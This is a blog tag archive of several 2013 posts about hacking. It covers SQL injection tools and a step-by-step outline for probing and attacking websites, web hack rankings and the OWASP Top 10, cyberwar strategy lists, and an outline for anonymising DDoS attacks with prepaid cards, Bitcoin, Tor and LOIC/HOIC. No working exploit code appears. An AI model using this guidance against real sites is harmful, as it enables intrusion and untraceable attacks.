Home » Posts tagged 'hacking'
Tag Archives: hacking
In my previous post in the hacker series http://decisionstats.com/2013/03/20/hacking-for-beginners-top-website-hacks/ , we noted that SQL Injection remains a top method for security vulnerabilities. Accordingly- here is a list of resources to learn SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability in an application’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
- SQL Inject Me
SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Basic Tutorials ( in order of learning)
A site for testing SQL Injection attacks. It is a test system and can be used for honing your SQL Skills.
Intermediate Tutorials on End to End SQL Injection
Step 1: Finding Vulnerable Website:
Step 2: Checking the Vulnerability:
To check the vulnerability , add the single quotes(‘) at the end of the url and hit enter.
If you got an error message , then it means that the site is vulnerable
Step 3: Finding Number of columns:
Step 4: Find the Vulnerable columns:
Step 5: Finding version,database,user
Step 6: Finding the Table Name
Step 8: Finding the Admin Panel:
- Next Tutorial uses an automated tool called Havij from
and the tutorial is at
I really liked this 2002 presentation on Website Hacks at blackhat.com/presentations/bh-asia-02/bh-asia-02-shah.pdf . It explains in a easy manner some common fundamentals in hacking websites. Take time to go through this- its a good example of how hacking tutorials need to be created if you want to expand the number of motivated hackers.
However a more recent list of hacks is here-
The Top Ten
- CRIME (1, 2, 3 4) by Juliano Rizzo and Thai Duong
- Pwning via SSRF (memcached, php-fastcgi, etc) (2, 3, 4, 5)
- Chrome addon hacking (2, 3, 4, 5)
- Bruteforce of PHPSESSID
- Cross-Site Port Attacks
- Permanent backdooring of HTML5 client-side application
- CAPTCHA Re-Riding Attack
- XSS: Gaining access to HttpOnly Cookie in 2012
- Attacking OData: HTTP Verb Tunneling, Navigation Properties for Additional Data Access, System Query Options ($select)
But a more widely used ranking method for Website Hacking is here. Note it is a more formal but probably a more recent document than the pdf above. If only it could be made into an easier to read tutorial, it would greatly improve website exploit security strength.
The Release Candidate for the OWASP Top 10 for 2013 is now available here: OWASP Top 10 – 2013 – Release Candidate
The OWASP Top 10 – 2013 Release Candidate includes the following changes as compared to the 2010 edition:
- A1 Injection
- A2 Broken Authentication and Session Management (was formerly A3)
- A3 Cross-Site Scripting (XSS) (was formerly A2)
- A4 Insecure Direct Object References
- A5 Security Misconfiguration (was formerly A6)
- A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection)
- A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access)
- A8 Cross-Site Request Forgery (CSRF) (was formerly A5)
- A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration)
- A10 Unvalidated Redirects and Forwards
Once again, I am presenting this as an example of how lucid documentation can help spread technological awareness to people affected by technical ignorance and lacking the savvy and chops for self-learning. If you need better cyber security, you need better documentation and tutorials on hacking for improving the quantity and quality of the pool of available hackers and bringing in young blood to enhance your cyber security edge.
How the West Counters China
- Using United Nations and WTO to present evidence to push for financial penalties
- Define Cyber- Retaliation rules of engagement and doctrine for hacking attacks
- Delineate the obfuscation between Anonymous, State Sponsored Hacks, Hactivism, Cyber Criminals- and build clear rules of engagement
- Provoke Chinese Naval and Air Assets (using the Opium War’s lessons)
- Create a digital cyber-warfare alliance using Australia, Japan, Taiwan, South Korea, India , Tibetan Exiles and NATO
How China can counter the West
- Build a dossier of false or misplaced allegations that are leveled at China and use them when something sticks
- Highlight Western Government’s breaches of citizen privacy and digital surveillance
- Highlight efforts of intellectual property theft, monopolistic actions and industrial espionage in the West
- Host more black hat conferences within Macau and Hong Kong if not mainland China
- Support Anonymous and Digital Activism as potential allies
The supreme art of war is to subdue the enemy without fighting.” ― Sun Tzu
I write on and off on hackers (see http://bit.ly/VWxSvP) and even some poetry on them (http://bit.ly/11RznQl) . During meetups, conferences, online discussions I run into them, I have interviewed them , and I have trained some of them (in analytics). Based on this decade long experience of observing hackers, and two decade long experience of hanging out with them- some thoughts on making you a better hacker, and a happier hacker even if you are a hacker activist or a hacker in enterprise software.
1) Everybody can be a hacker, but you need to know the basic attitude first. Not every Python or Java coder is a hacker. Coding is not hacking. More details here- http://decisionstats.com/2012/02/12/how-to-learn-to-be-a-hacker-easily/
2) Use tools like Coursera, Udacity, Codeacdemy to learn new languages. Even if you dont have the natural gift for memorizing syntax, some of it helps. (I forget syntax quite often. I google)
3) Learn tools like Metasploit if you want to learn the lucrative and romantic art of exploits hacking (http://www.offensive-security.com/metasploit-unleashed/Main_Page). The demand for information security is going to be huge. hackers with jobs are happy hackers.
4) Develop a serious downtime hobby.
Lets face it- your body was not designed to sit in front of a computer for 8 hours. But being a hacker will mean that commitment and maybe more.
This is not about hacking the cloud. Instead this is about using the cloud to hack
Some articles last year wrote on how hackers used Amazon Ec2 for hacking/ddos attacks.
Roth claims that a typical wireless password can be guessed by EC2 and his software in about six minutes. He proved this by hacking networks in the area where he lives. The type of EC2 computers used in the attack costs 28 cents per minute, so $1.68 is all it could take to lay open a wireless network.
Cloud services are also attractive for hackers because the use of multiple servers can facilitate tasks such as cracking passwords, said Ray Valdes, an analyst at Gartner Inc. Amazon could improve measures to weed out bogus accounts, he said.
and this article by Anti-Sec pointed out how one can obtain a debit card anonymously
VPN Account without paper trail
- Purchase prepaid visa card with cash
- Purchase Bitcoins with Money Order
- Donate Bitcoins to different account
Masking your IP address to log on is done by TOR
and the actual flooding is done by tools like LOIC or HOIC
So what safeguards can be expected from the next wave of Teenage Mutant Ninjas..?